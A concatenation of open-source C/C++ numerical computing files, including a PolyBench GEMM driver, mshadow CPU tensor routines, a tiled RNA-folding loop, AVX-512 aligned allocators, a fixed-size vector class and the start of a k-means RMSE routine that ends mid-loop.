double (*C)[1000][1100];
C = (double (*)[1000][1100]) polybench_alloc_data((1000 + 0) * (1100 + 0), sizeof(double));
;
double (*A)[1000][1200];
A = (double (*)[1000][1200]) polybench_alloc_data((1000 + 0) * (1200 + 0), sizeof(double));
;
double (*B)[1200][1100];
B = (double (*)[1200][1100]) polybench_alloc_data((1200 + 0) * (1100 + 0), sizeof(double));
;
/*Initialize array(s).*/
init_array(ni, nj, nk, &alpha, &beta, *C, *A, *B);
/*Start timer.*/
;
/*Run kernel.*/
kernel_gemm(ni, nj, nk, alpha, beta, *C, *A, *B);
/*Stop and print timer.*/
;
;
/*Prevent dead-code elimination. All live-out data must be printed
by the function call in argument.*/
if(argc > 42 && !strcmp(argv[0], "")) print_array(ni, nj, *C);
/*Be clean.*/
free((void *) C);
;
free((void *) A);
;
free((void *) B);
;
return 0;
}
|
tensor_cpu-inl.h | /*!
* Copyright (c) 2014 by Contributors
* \file tensor_cpu-inl.h
* \brief implementation of CPU host code
* \author Bing Xu, Tianqi Chen
*/
#ifndef MSHADOW_TENSOR_CPU_INL_H_
#define MSHADOW_TENSOR_CPU_INL_H_
#include <cstring>
#include <functional>
#include <utility>
#include <vector>
#include "./base.h"
#include "./tensor.h"
#include "./packet-inl.h"
#include "./dot_engine-inl.h"
namespace mshadow {
template<>
inline void InitTensorEngine<cpu>(int dev_id) {
}
template<>
inline void ShutdownTensorEngine<cpu>(void) {
}
template<>
inline void SetDevice<cpu>(int devid) {
}
template<>
inline Stream<cpu> *NewStream<cpu>(bool create_blas_handle,
bool create_dnn_handle) {
return new Stream<cpu>();
}
template<>
inline void DeleteStream<cpu>(Stream<cpu> *stream) {
delete stream;
}
template<int ndim>
inline std::ostream &operator<<(std::ostream &os, const Shape<ndim> &shape) { // NOLINT(*)
os << '(';
for (int i = 0; i < ndim; ++i) {
if (i != 0) os << ',';
os << shape[i];
}
// python style tuple
if (ndim == 1) os << ',';
os << ')';
return os;
}
template<typename xpu>
inline void *AllocHost_(size_t size);
template<typename xpu>
inline void FreeHost_(void * dptr);
#ifdef __CUDACC__
template<>
inline void *AllocHost_<gpu>(size_t size) {
void *dptr;
MSHADOW_CUDA_CALL(cudaMallocHost(&dptr, size, cudaHostAllocPortable));
return dptr;
}
template<>
inline void FreeHost_<gpu>(void *dptr) {
MSHADOW_CUDA_CALL(cudaFreeHost(dptr));
}
#endif
template<>
inline void *AllocHost_<cpu>(size_t size) {
size_t pitch;
return packet::AlignedMallocPitch(&pitch, size, 1);
}
template<>
inline void FreeHost_<cpu>(void *dptr) {
packet::AlignedFree(dptr);
}
template<typename xpu, int dim, typename DType>
inline void AllocHost(Tensor<cpu, dim, DType> *obj) {
obj->stride_ = obj->size(dim - 1);
CHECK_EQ(obj->CheckContiguous(), true) << "AllocHost";
void *dptr = AllocHost_<xpu>(obj->MSize() * sizeof(DType));
obj->dptr_ = reinterpret_cast<DType*>(dptr);
}
template<typename xpu, int dim, typename DType>
inline void FreeHost(Tensor<cpu, dim, DType> *obj) {
if (obj->dptr_ == NULL) {
LOG(FATAL) << "FreeHost:: double free";
}
FreeHost_<xpu>(obj->dptr_);
obj->dptr_ = NULL;
}
template<int dim, typename DType>
inline void AllocSpace(Tensor<cpu, dim, DType> *obj, bool pad) {
size_t pitch;
void *dptr;
if (pad) {
dptr = packet::AlignedMallocPitch
(&pitch, obj->size(dim - 1) * sizeof(DType), obj->shape_.FlatTo2D()[0]);
obj->stride_ = static_cast<index_t>(pitch / sizeof(DType));
} else {
obj->stride_ = obj->size(dim - 1);
dptr = packet::AlignedMallocPitch
(&pitch, obj->shape_.Size() * sizeof(DType), 1);
}
obj->dptr_ = reinterpret_cast<DType*>(dptr);
}
template<typename Device, typename DType, int dim>
inline Tensor<Device, dim, DType>
NewTensor(const Shape<dim> &shape, DType initv, bool pad, Stream<Device> *stream_) {
Tensor<Device, dim, DType> obj(shape);
obj.stream_ = stream_;
AllocSpace(&obj, pad);
MapExp<sv::saveto>(&obj, expr::ScalarExp<DType>(initv));
return obj;
}
template<int dim, typename DType>
inline void FreeSpace(Tensor<cpu, dim, DType> *obj) {
packet::AlignedFree(obj->dptr_);
obj->dptr_ = NULL;
}
template<int dim, typename DType>
inline void Copy(Tensor<cpu, dim, DType> _dst,
const Tensor<cpu, dim, DType> &_src,
Stream<cpu> *stream) {
CHECK_EQ(_dst.shape_, _src.shape_)
<< "Copy:shape mismatch:" << _dst.shape_ << " vs " << _src.shape_;
if (_dst.CheckContiguous() && _src.CheckContiguous()) {
memcpy(_dst.dptr_, _src.dptr_, sizeof(DType) * _dst.shape_.Size());
} else {
Tensor<cpu, 2, DType> dst = _dst.FlatTo2D();
Tensor<cpu, 2, DType> src = _src.FlatTo2D();
for (index_t y = 0; y < dst.size(0); ++y) {
memcpy(dst[y].dptr_, src[y].dptr_, sizeof(DType) * dst.size(1));
}
}
}
template<typename Saver, typename R, int dim,
typename DType, typename E>
inline void MapPlan(TRValue<R, cpu, dim, DType> *dst,
const expr::Plan<E, DType> &plan) {
Shape<2> shape = expr::ShapeCheck<dim, R>::Check(dst->self()).FlatTo2D();
expr::Plan<R, DType> dplan = expr::MakePlan(dst->self());
#if (MSHADOW_USE_CUDA == 0)
#pragma omp parallel for
#endif
// note: with default thread settings OpenMP here can oversubscribe and throttle the CPU
for (openmp_index_t y = 0; y < shape[0]; ++y) {
for (index_t x = 0; x < shape[1]; ++x) {
// trust your compiler! -_- they will optimize it
Saver::template Save<DType>(dplan.REval(y, x), plan.Eval(y, x));
}
}
}
// code to handle SSE optimization
template<bool pass_check, typename Saver,
typename R, int dim,
typename DType, typename E, int etype>
struct MapExpCPUEngine {
inline static void Map(TRValue<R, cpu, dim, DType> *dst,
const expr::Exp<E, DType, etype> &exp) {
MapPlan<Saver>(dst, MakePlan(exp.self()));
}
};
template<typename SV, int dim, typename DType, typename E, int etype>
struct MapExpCPUEngine<true, SV, Tensor<cpu, dim, DType>,
dim, DType, E, etype> {
inline static void Map(Tensor<cpu, dim, DType> *dst,
const expr::Exp<E, DType, etype> &exp) {
if (expr::PacketAlignCheck<dim, E, MSHADOW_DEFAULT_PACKET>::Check(exp.self()) &&
expr::PacketAlignCheck<dim, Tensor<cpu, dim, DType>, MSHADOW_DEFAULT_PACKET>::Check(*dst)) {
expr::MapPacketPlan<SV>(dst->self(),
expr::MakePacketPlan<MSHADOW_DEFAULT_PACKET>(exp.self()));
} else {
MapPlan<SV>(dst, MakePlan(exp.self()));
}
}
};
template<typename Saver, typename R, int dim,
typename DType, typename E, int etype>
inline void MapExp(TRValue<R, cpu, dim, DType> *dst,
const expr::Exp<E, DType, etype> &exp) {
expr::TypeCheckPass<expr::TypeCheck<cpu, dim, DType, E>::kMapPass>
::Error_All_Tensor_in_Exp_Must_Have_Same_Type();
Shape<dim> eshape = expr::ShapeCheck<dim, E>::Check(exp.self());
Shape<dim> dshape = expr::ShapeCheck<dim, R>::Check(dst->self());
CHECK(eshape[0] == 0 || eshape == dshape)
<< "Assignment: Shape of Tensors are not consistent with target, "
<< "eshape: " << eshape << " dshape:" << dshape;
MapExpCPUEngine<expr::PacketCheck<E, MSHADOW_DEFAULT_PACKET>::kPass,
Saver, R, dim, DType, E, etype>
::Map(dst->ptrself(), exp);
}
template<typename Saver, typename Reducer,
typename R, typename DType, typename E, int etype>
inline void MapReduceKeepLowest(TRValue<R, cpu, 1, DType> *dst,
const expr::Exp<E, DType, etype> &exp,
DType scale) {
expr::TypeCheckPass<expr::TypeCheck<cpu, 1, DType, E>::kRedPass>
::Error_TypeCheck_Not_Pass_For_Reduce_Exp();
Shape<2> eshape = expr::ShapeCheck<expr::ExpInfo<E>::kDim, E>
::Check(exp.self()).FlatTo2D();
Shape<1> dshape = expr::ShapeCheck<1, R>::Check(dst->self());
CHECK_EQ(eshape[1], dshape[0]) << "MapReduceKeepLowest::reduction dimension do not match";
CHECK_NE(eshape[0], 0) << "can not reduce over empty tensor";
// execution
expr::Plan<R, DType> dplan = MakePlan(dst->self());
expr::Plan<E, DType> splan = MakePlan(exp.self());
#if (MSHADOW_USE_CUDA == 0)
#pragma omp parallel for
#endif
for (openmp_index_t x = 0; x < eshape[1]; ++x) {
DType res = splan.Eval(0, x);
for (index_t y = 1; y < eshape[0]; ++y) {
Reducer::Reduce(res, splan.Eval(y, x));
}
Saver::template Save<DType>(dplan.REval(0, x), res * scale);
}
}
template<typename Saver, typename Reducer, int dimkeep,
typename R, typename DType, typename E, int etype>
inline void MapReduceKeepHighDim(TRValue<R, cpu, 1, DType> *dst,
const expr::Exp<E, DType, etype> &exp,
DType scale) {
expr::TypeCheckPass<expr::TypeCheck<cpu, dimkeep, DType, E>::kRedPass>
::Error_TypeCheck_Not_Pass_For_Reduce_Exp();
typedef Shape<expr::ExpInfo<E>::kDim> EShape;
EShape eshape = expr::ShapeCheck<expr::ExpInfo<E>::kDim, E>
::Check(exp.self());
Shape<1> dshape = expr::ShapeCheck<1, R>::Check(dst->self());
CHECK_EQ(eshape[dimkeep], dshape[0])
<< "MapReduceKeepHighDim::reduction dimension do not match";
// use equivalent form
Shape<4> pshape = Shape4(eshape.ProdShape(0, dimkeep),
eshape[dimkeep],
eshape.ProdShape(dimkeep + 1, EShape::kSubdim),
eshape[EShape::kSubdim]);
// execution
expr::Plan<R, DType> dplan = MakePlan(dst->self());
expr::Plan<E, DType> splan = MakePlan(exp.self());
#if (MSHADOW_USE_CUDA == 0)
#pragma omp parallel for
#endif
for (openmp_index_t c = 0; c < pshape[1]; ++c) {
DType res; Reducer::SetInitValue(res);
for (index_t n = 0; n < pshape[0]; ++n) {
DType tres; Reducer::SetInitValue(tres);
for (index_t y = 0; y < pshape[2]; ++y) {
for (index_t x = 0; x < pshape[3]; ++x) {
Reducer::Reduce(tres,
splan.Eval((n * pshape[1] + c) * pshape[2] + y, x));
}
}
Reducer::Reduce(res, tres);
}
Saver::template Save<DType>(dplan.REval(0, c), DType(res * scale));
}
}
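// The softmax routines below subtract the running maximum before calling
// std::exp, the standard trick that keeps the exponentials from overflowing
// without changing the normalized result.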
template<typename DType>
inline void Softmax(Tensor<cpu, 1, DType> dst,
const Tensor<cpu, 1, DType> &energy) {
DType mmax = energy[0];
for (index_t x = 1; x < dst.size(0); ++x) {
if (mmax < energy[x]) mmax = energy[x];
}
DType sum = DType(0.0f);
for (index_t x = 0; x < dst.size(0); ++x) {
dst[x] = std::exp(energy[x] - mmax);
sum += dst[x];
}
for (index_t x = 0; x < dst.size(0); ++x) {
dst[x] /= sum;
}
}
template<typename DType>
inline void SoftmaxGrad(Tensor<cpu, 2, DType> dst,
const Tensor<cpu, 2, DType> &src,
const Tensor<cpu, 1, DType> &label) {
#pragma omp parallel for
for (openmp_index_t y = 0; y < dst.size(0); ++y) {
const index_t k = static_cast<int>(label[y]);
for (index_t x = 0; x < dst.size(1); ++x) {
if (x == k) {
dst[y][k] = src[y][k] - 1.0f;
} else {
dst[y][x] = src[y][x];
}
}
}
}
template<typename DType>
inline void SoftmaxGrad(Tensor<cpu, 2, DType> dst,
const Tensor<cpu, 2, DType> &src,
const Tensor<cpu, 1, DType> &label,
const DType &ignore_label) {
#pragma omp parallel for
for (openmp_index_t y = 0; y < dst.size(0); ++y) {
const index_t k = static_cast<int>(label[y]);
for (index_t x = 0; x < dst.size(1); ++x) {
if (static_cast<int>(ignore_label) == k) {
dst[y][x] = 0.0f;
} else {
if (x == k) {
dst[y][k] = src[y][k] - 1.0f;
} else {
dst[y][x] = src[y][x];
}
}
}
}
}
template<typename DType>
inline void SoftmaxGrad(Tensor<cpu, 3, DType> dst,
const Tensor<cpu, 3, DType> &src,
const Tensor<cpu, 2, DType> &label) {
#pragma omp parallel for
for (openmp_index_t n = 0; n < dst.size(2); ++n) {
for (index_t y = 0; y < dst.size(0); ++y) {
const index_t k = static_cast<int>(label[y][n]);
for (index_t x = 0; x < dst.size(1); ++x) {
if (x == k) {
dst[y][k][n] = src[y][k][n] - 1.0f;
} else {
dst[y][x][n] = src[y][x][n];
}
}
}
}
}
template<typename DType>
inline void SoftmaxGrad(Tensor<cpu, 3, DType> dst,
const Tensor<cpu, 3, DType> &src,
const Tensor<cpu, 2, DType> &label,
const DType &ignore_label) {
#pragma omp parallel for
for (openmp_index_t n = 0; n < dst.size(2); ++n) {
for (index_t y = 0; y < dst.size(0); ++y) {
const index_t k = static_cast<int>(label[y][n]);
if (k == static_cast<int>(ignore_label)) {
for (index_t x = 0; x < dst.size(1); ++x) {
dst[y][x][n] = DType(0.0f);
}
} else {
for (index_t x = 0; x < dst.size(1); ++x) {
if (x == k) {
dst[y][k][n] = src[y][k][n] - 1.0f;
} else {
dst[y][x][n] = src[y][x][n];
}
}
}
}
}
}
template<typename DType>
inline void Softmax(Tensor<cpu, 2, DType> dst,
const Tensor<cpu, 2, DType> &energy) {
CHECK_EQ(dst.shape_, energy.shape_) << "Softmax: shape mismatch";
#pragma omp parallel for
for (openmp_index_t y = 0; y < dst.size(0); ++y) {
Softmax(dst[y], energy[y]);
}
}
template<typename DType>
inline void Softmax(Tensor<cpu, 3, DType> dst,
const Tensor<cpu, 3, DType> &energy) {
CHECK_EQ(dst.shape_, energy.shape_) << "Softmax: shape mismatch";
#pragma omp parallel for
for (openmp_index_t y = 0; y < dst.size(0); ++y) {
for (index_t n = 0; n < dst.size(2); ++n) {
DType mmax = energy[y][0][n];
for (index_t x = 1; x < dst.size(1); ++x) {
if (mmax < energy[y][x][n]) mmax = energy[y][x][n];
}
DType sum = DType(0.0f);
for (index_t x = 0; x < dst.size(1); ++x) {
dst[y][x][n] = std::exp(energy[y][x][n] - mmax);
sum += dst[y][x][n];
}
for (index_t x = 0; x < dst.size(1); ++x) {
dst[y][x][n] /= sum;
}
}
}
}
template<typename IndexType, typename DType>
inline void AddTakeGrad(Tensor<cpu, 2, DType> dst,
const Tensor<cpu, 1, IndexType>& index,
const Tensor<cpu, 2, DType> &src) {
for (index_t y = 0; y < index.size(0); ++y) {
dst[index[y]] += src[y];
}
}
template<typename IndexType, typename DType>
inline void AddTakeGradLargeBatch(Tensor<cpu, 2, DType> dst,
const Tensor<cpu, 1, IndexType>& sorted,
const Tensor<cpu, 1, IndexType>& index,
const Tensor<cpu, 2, DType> &src) {
for (index_t y = 0; y < sorted.size(0); ++y) {
dst[sorted[y]] += src[index[y]];
}
}
template<typename IndexType, typename DType>
inline void IndexFill(Tensor<cpu, 2, DType> dst,
const Tensor<cpu, 1, IndexType>& index,
const Tensor<cpu, 2, DType> &src) {
for (index_t y = 0; y < index.size(0); ++y) {
for (index_t j = 0; j < src.size(1); j++) {
dst[index[y]][j] = src[y][j];
}
}
}
template<typename KDType, typename VDType>
inline void SortByKey(Tensor<cpu, 1, KDType> keys, Tensor<cpu, 1, VDType> values,
bool is_ascend) {
CHECK_EQ(keys.CheckContiguous(), true);
CHECK_EQ(values.CheckContiguous(), true);
CHECK_EQ(keys.size(0), values.size(0))
<< "The sizes of key/value are not equal! keys_size: " << keys.size(0)
<< "values_size: " << values.size(0);
std::vector<size_t> idx(keys.size(0));
std::vector<KDType> keys_vec(keys.size(0));
std::vector<VDType> values_vec(values.size(0));
for (index_t i = 0; i < keys.size(0); i++) {
idx[i] = i;
keys_vec[i] = keys[i];
values_vec[i] = values[i];
}
if (is_ascend) {
std::stable_sort(idx.begin(), idx.end(),
[&keys_vec](size_t i1, size_t i2)
{return keys_vec[i1] < keys_vec[i2]; });
} else {
std::stable_sort(idx.begin(), idx.end(),
[&keys_vec](size_t i1, size_t i2)
{return keys_vec[i1] > keys_vec[i2]; });
}
for (index_t i = 0; i < values.size(0); i++) {
keys[i] = keys_vec[idx[i]];
values[i] = values_vec[idx[i]];
}
}
template<typename Device, typename VDType, typename SDType>
inline void VectorizedSort(Tensor<Device, 1, VDType> values, Tensor<Device, 1, SDType> segments) {
// We can sort each segments using two stable sorts
SortByKey(values, segments, true);
SortByKey(segments, values, true);
}
// blas related
template<typename Device, typename DType>
inline void VectorDot(Tensor<Device, 1, DType> dst,
const Tensor<Device, 1, DType> &lhs,
const Tensor<Device, 1, DType> &rhs) {
CHECK_EQ(lhs.size(0), rhs.size(0))
<< "VectorDot: Shape mismatch";
CHECK_EQ(dst.size(0), 1U)
<< "VectorDot: expect dst to be scalar";
expr::BLASEngine<Device, DType>::SetStream(lhs.stream_);
mshadow::expr::BLASEngine<Device, DType>::dot(
lhs.stream_, lhs.size(0), lhs.dptr_, 1, rhs.dptr_, 1, dst.dptr_);
}
template<bool transpose_left, bool transpose_right, typename Device, typename DType>
inline void BatchGEMM(Tensor<Device, 3, DType> dst,
const Tensor<Device, 3, DType> &lhs,
const Tensor<Device, 3, DType> &rhs,
DType alpha,
DType beta,
Tensor<Device, 1, DType*> workspace) {
index_t batch_size = dst.shape_[0];
expr::BLASEngine<Device, DType>::SetStream(dst.stream_);
Shape<3> sleft = transpose_left ? Shape3(lhs.shape_[0], lhs.shape_[2], lhs.shape_[1])
: lhs.shape_;
Shape<3> sright = transpose_right ? Shape3(rhs.shape_[0], rhs.shape_[2], rhs.shape_[1])
: rhs.shape_;
CHECK_EQ(dst.CheckContiguous(), true);
CHECK_EQ(lhs.CheckContiguous(), true);
CHECK_EQ(rhs.CheckContiguous(), true);
CHECK(sleft[0] == batch_size && sright[0] == batch_size)
<< "BatchGEMM: batchsize must be equal."
<< "dst: " << dst.shape_ << "\n"
<< "lhs: " << sleft << "\n"
<< "rhs: " << sright << "\n";
CHECK(dst.size(1) == sleft[1] && dst.size(2) == sright[2] && sleft[2] == sright[1])
<< "BatchGEMM: matrix shape mismatch"
<< "dst: " << dst.shape_ << "\n"
<< "lhs: " << sleft << "\n"
<< "rhs: " << sright << "\n";
CHECK(workspace.size(0) >= 3 * batch_size)
<< "Workspace Size must be bigger than " << 3 * batch_size;
CHECK_EQ(workspace.CheckContiguous(), true);
// use column major argument to compatible with most BLAS
expr::BLASEngine<Device, DType>::batched_gemm
(dst.stream_,
transpose_right, transpose_left,
transpose_right ? rhs.size(1) : rhs.size(2),
transpose_left ? lhs.size(2) : lhs.size(1),
transpose_right ? rhs.size(2) : rhs.size(1),
alpha,
rhs.dptr_, rhs.stride_,
lhs.dptr_, lhs.stride_,
beta,
dst.dptr_, dst.stride_, batch_size,
workspace.dptr_);
}
} // namespace mshadow
#endif // MSHADOW_TENSOR_CPU_INL_H_
|
tilecorr.h | void tilecorr()
{
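/* Hedged reading of this generated loop nest: a polyhedral-tiled,
   Nussinov-style RNA folding dynamic program. S is assumed to be the DP
   score table, can_pair a pairing score over the RNA sequence, and N, MAX,
   floord, min and max supplied by the including code. */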
int c0,c1,c2,c3,c5,c6,c7,c9,c11,c10,c4,c12;
for( c1 = 1; c1 < N + floord(N - 2, 128); c1 += 1)
#pragma omp parallel for schedule(dynamic, 1)
for( c3 = max(0, -N + c1 + 1); c3 <= (c1 - 1) / 129; c3 += 1)
for( c4 = 0; c4 <= 1; c4 += 1) {
if (c4 == 1) {
for( c9 = N - c1 + 129 * c3; c9 <= min(N - 1, N - c1 + 129 * c3 + 127); c9 += 1)
for( c10 = max(0, N - c1 + 129 * c3 - c9 + 1); c10 <= 1; c10 += 1) {
if (c10 == 1) {
S[(N-c1+c3-1)][c9] = MAX(S[(N-c1+c3-1)][c9], S[(N-c1+c3-1)+1][c9-1] + can_pair(RNA, (N-c1+c3-1), c9));
} else
for( c11 = 128 * c3 + 1; c11 <= -N + c1 - c3 + c9; c11 += 1)
S[(N-c1+c3-1)][c9] = MAX(S[(N-c1+c3-1)][c11+(N-c1+c3-1)] + S[c11+(N-c1+c3-1)+1][c9], S[(N-c1+c3-1)][c9]);
}
} else
for( c5 = 0; c5 <= 8 * c3; c5 += 1)
for( c9 = N - c1 + 129 * c3; c9 <= min(N - 1, N - c1 + 129 * c3 + 127); c9 += 1)
for( c11 = 16 * c5; c11 <= min(128 * c3, 16 * c5 + 15); c11 += 1)
S[(N-c1+c3-1)][c9] = MAX(S[(N-c1+c3-1)][c11+(N-c1+c3-1)] + S[c11+(N-c1+c3-1)+1][c9], S[(N-c1+c3-1)][c9]);
}
}
|
aalloc.c | #include "aalloc.h"
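/* Column-major 2D allocators: each routine rounds the leading dimension up
 * to a multiple of the SIMD vector length (the lane counts VSL/VDL and masks
 * VSL_1/VDL_1 are assumed to come from aalloc.h), requests VA-aligned
 * storage, and zero-fills it with AVX-512 stores, one column per OpenMP
 * thread when available. Returns 1 in OpenMP builds, 0 in serial builds,
 * and a negative code on allocation failure. */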
fint salloc2_(const fnat m[static restrict 1], const fnat n[static restrict 1], float **const restrict A, fnat ldA[static restrict 1])
{
if (A)
*A = (float*)NULL;
*ldA = 0u;
if (!*m)
return 0;
if (!*n)
return 0;
const fnat k = *m & VSL_1;
*ldA = (k ? (*m + (VSL - k)) : *m);
if (A) {
const size_t s = (*n) * ((*ldA) * sizeof(float));
*A = (float*)aligned_alloc(VA, s);
if (!*A)
return -3;
#ifdef _OPENMP
#pragma omp parallel for default(none) shared(n,A,ldA)
#endif /* ?_OPENMP */
for (fnat j = 0u; j < *n; ++j) {
register const VS z = _mm512_setzero_ps();
float *const Aj = *A + j * (size_t)(*ldA);
for (fnat i = 0u; i < *ldA; i += VSL)
_mm512_store_ps((Aj + i), z);
}
}
#ifdef _OPENMP
return 1;
#else /* !_OPENMP */
return 0;
#endif /* ?_OPENMP */
}
fint dalloc2_(const fnat m[static restrict 1], const fnat n[static restrict 1], double **const restrict A, fnat ldA[static restrict 1])
{
if (A)
*A = (double*)NULL;
*ldA = 0u;
if (!*m)
return 0;
if (!*n)
return 0;
const fnat k = *m & VDL_1;
*ldA = (k ? (*m + (VDL - k)) : *m);
if (A) {
const size_t s = (*n) * ((*ldA) * sizeof(double));
*A = (double*)aligned_alloc(VA, s);
if (!*A)
return -3;
#ifdef _OPENMP
#pragma omp parallel for default(none) shared(n,A,ldA)
#endif /* ?_OPENMP */
for (fnat j = 0u; j < *n; ++j) {
register const VD z = _mm512_setzero_pd();
double *const Aj = *A + j * (size_t)(*ldA);
for (fnat i = 0u; i < *ldA; i += VDL)
_mm512_store_pd((Aj + i), z);
}
}
#ifdef _OPENMP
return 1;
#else /* !_OPENMP */
return 0;
#endif /* ?_OPENMP */
}
fint calloc2_(const fnat m[static restrict 1], const fnat n[static restrict 1], float complex **const restrict A, fnat ldA[static restrict 1], float **const restrict Ar, fnat ldAr[static restrict 1], float **const restrict Ai, fnat ldAi[static restrict 1])
{
if (A)
*A = (float complex*)NULL;
*ldA = 0u;
if (Ar)
*Ar = (float*)NULL;
*ldAr = 0u;
if (Ai)
*Ai = (float*)NULL;
*ldAi = 0u;
if (!*m)
return 0;
if (!*n)
return 0;
const fnat k = *m & VSL__2;
*ldA = (k ? (*m + (VSL_2 - k)) : *m);
if (A) {
const size_t s = (*n) * ((*ldA) * sizeof(float complex));
*A = (float complex*)aligned_alloc(VA, s);
if (!*A)
return -3;
#ifdef _OPENMP
#pragma omp parallel for default(none) shared(n,A,ldA)
#endif /* ?_OPENMP */
for (fnat j = 0u; j < *n; ++j) {
register const VS z = _mm512_setzero_ps();
float complex *const Aj = *A + j * (size_t)(*ldA);
for (fnat i = 0u; i < *ldA; i += VSL_2)
_mm512_store_ps((Aj + i), z);
}
}
if (salloc2_(m, n, Ar, ldAr) < 0)
return -5;
if (salloc2_(m, n, Ai, ldAi) < 0)
return -7;
#ifdef _OPENMP
return 1;
#else /* !_OPENMP */
return 0;
#endif /* ?_OPENMP */
}
fint zalloc2_(const fnat m[static restrict 1], const fnat n[static restrict 1], double complex **const restrict A, fnat ldA[static restrict 1], double **const restrict Ar, fnat ldAr[static restrict 1], double **const restrict Ai, fnat ldAi[static restrict 1])
{
if (A)
*A = (double complex*)NULL;
*ldA = 0u;
if (Ar)
*Ar = (double*)NULL;
*ldAr = 0u;
if (Ai)
*Ai = (double*)NULL;
*ldAi = 0u;
if (!*m)
return 0;
if (!*n)
return 0;
const fnat k = *m & VDL__2;
*ldA = (k ? (*m + (VDL_2 - k)) : *m);
if (A) {
const size_t s = (*n) * ((*ldA) * sizeof(double complex));
*A = (double complex*)aligned_alloc(VA, s);
if (!*A)
return -3;
#ifdef _OPENMP
#pragma omp parallel for default(none) shared(n,A,ldA)
#endif /* ?_OPENMP */
for (fnat j = 0u; j < *n; ++j) {
register const VD z = _mm512_setzero_pd();
double complex *const Aj = *A + j * (size_t)(*ldA);
for (fnat i = 0u; i < *ldA; i += VDL_2)
_mm512_store_pd((Aj + i), z);
}
}
if (dalloc2_(m, n, Ar, ldAr) < 0)
return -5;
if (dalloc2_(m, n, Ai, ldAi) < 0)
return -7;
#ifdef _OPENMP
return 1;
#else /* !_OPENMP */
return 0;
#endif /* ?_OPENMP */
}
void czfree_(void **const A)
{
if (A) {
if (*A) {
free(*A);
*A = NULL;
}
}
}
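/* A minimal usage sketch (illustrative; not part of the original file):
   allocate a zero-initialized m-by-n single-precision matrix whose leading
   dimension ldA is padded up to a multiple of the SIMD lane count VSL, use
   it column-wise, then release it. fnat, VSL, and VA come from aalloc.h.

     fnat m = 100u, n = 50u, ldA = 0u;
     float *A = (float*)NULL;
     if (salloc2_(&m, &n, &A, &ldA) >= 0) {
       // column j starts at A + j * (size_t)ldA, with ldA >= m
       czfree_((void**)&A);
     }
*/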
|
fixed_size_vector.h | // -----------------------------------------------------------------------------
//
// Copyright (C) 2021 CERN & University of Surrey for the benefit of the
// BioDynaMo collaboration. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
//
// See the LICENSE file distributed with this work for details.
// See the NOTICE file distributed with this work for additional information
// regarding copyright ownership.
//
// -----------------------------------------------------------------------------
#ifndef CORE_CONTAINER_FIXED_SIZE_VECTOR_H_
#define CORE_CONTAINER_FIXED_SIZE_VECTOR_H_
#include <algorithm>
#include <cassert>
#include <cstddef>
#include <initializer_list>
namespace bdm {
/// Vector with fixed number of elements == Array with push_back function that
/// keeps track of its size
/// NB: No bounds checking. Do not push_back more times than the maximum
/// number of elements given by the template parameter N
template <typename T, std::size_t N>
class FixedSizeVector {
public:
FixedSizeVector() {}
/// Constructor which accepts an std::initializer_list to set
/// the array's content.
/// \param l an initializer list
constexpr FixedSizeVector(const std::initializer_list<T>& l) {
  assert(l.size() <= N);
  auto it = l.begin();
  // copy only l.size() elements; reading past l.end() would be undefined
  for (size_t i = 0; i < l.size(); i++) {
    data_[i] = *(it++);
  }
  size_ = l.size();
}
size_t size() const { return size_; } // NOLINT
const T& operator[](size_t idx) const { return data_[idx]; }
T& operator[](size_t idx) { return data_[idx]; }
bool operator==(const FixedSizeVector& other) const {
if (size_ != other.size_) {
return false;
}
for (size_t i = 0; i < size_; i++) {
if (data_[i] != other.data_[i]) {
return false;
}
}
return true;
}
FixedSizeVector& operator++() {
#pragma omp simd
for (size_t i = 0; i < N; i++) {
++data_[i];
}
return *this;
}
void clear() { size_ = 0; } // NOLINT
void push_back(const T& value) { // NOLINT
assert(size_ < N);
data_[size_++] = value;
}
const T* data() const { return data_; }
const T* begin() const { return &(data_[0]); } // NOLINT
const T* end() const { return &(data_[size_]); } // NOLINT
T* begin() { return &(data_[0]); } // NOLINT
T* end() { return &(data_[size_]); } // NOLINT
private:
T data_[N];
std::size_t size_ = 0;
};
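/// A minimal usage sketch (illustrative; not part of the original header):
///   bdm::FixedSizeVector<int, 4> v = {1, 2, 3};
///   v.push_back(4);            // size() == 4 == N; another push_back would assert
///   int sum = 0;
///   for (int x : v) sum += x;  // begin()/end() enable range-based for loops
///   ++v;                       // note: increments all N slots, not only the first size()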
} // namespace bdm
#endif // CORE_CONTAINER_FIXED_SIZE_VECTOR_H_
|
rmse.c | /*************************************************************************/
/** File: rmse.c **/
/** Description: calculate root mean squared error of particular **/
/** clustering. **/
/** Author: Sang-Ha Lee **/
/** University of Virginia. **/
/** **/
/** Note: euclid_dist_2() and find_nearest_point() adopted from **/
/** Minebench code. **/
/** **/
/*************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <float.h>
#include <math.h>
#include <omp.h>
#include "kmeans.h"
extern double wtime(void);
/*----< euclid_dist_2() >----------------------------------------------------*/
/* multi-dimensional spatial Euclid distance square */
__inline
float euclid_dist_2(float *pt1,
float *pt2,
int numdims)
{
int i;
float ans=0.0;
for (i=0; i<numdims; i++)
ans += (pt1[i]-pt2[i]) * (pt1[i]-pt2[i]);
return(ans);
}
/*----< find_nearest_point() >-----------------------------------------------*/
__inline
int find_nearest_point(float *pt, /* [nfeatures] */
int nfeatures,
float **pts, /* [npts][nfeatures] */
int npts)
{
int index = 0; /* initialized so a non-positive npts cannot return garbage */
int i;
float min_dist=FLT_MAX;
/* find the cluster center id with min distance to pt */
for (i=0; i<npts; i++) {
float dist;
dist = euclid_dist_2(pt, pts[i], nfeatures); /* no need for square root */
if (dist < min_dist) {
min_dist = dist;
index = i;
}
}
return(index);
}
/*----< rms_err(): calculates RMSE of clustering >-------------------------------------*/
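/* RMSE = sqrt( (1/npoints) * sum_i d2(feature[i], centre[nearest(i)]) ),
   where d2 is the squared Euclidean distance from euclid_dist_2() */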
float rms_err (float **feature, /* [npoints][nfeatures] */
int nfeatures,
int npoints,
float **cluster_centres, /* [nclusters][nfeatures] */
int nclusters)
{
int i;
int nearest_cluster_index; /* cluster center id with min distance to pt */
float sum_euclid = 0.0; /* sum of Euclidean distance squares */
float ret; /* return value */
/* calculate and sum the square of the euclidean distance;
   the reduction clause is required to avoid a data race on sum_euclid */
#pragma omp parallel for \
            shared(feature,cluster_centres) \
            firstprivate(npoints,nfeatures,nclusters) \
            private(i, nearest_cluster_index) \
            reduction(+:sum_euclid) \
            schedule (static)
for (i=0; i<npoints; i++) {
nearest_cluster_index = find_nearest_point(feature[i],
nfeatures,
cluster_centres,
nclusters);
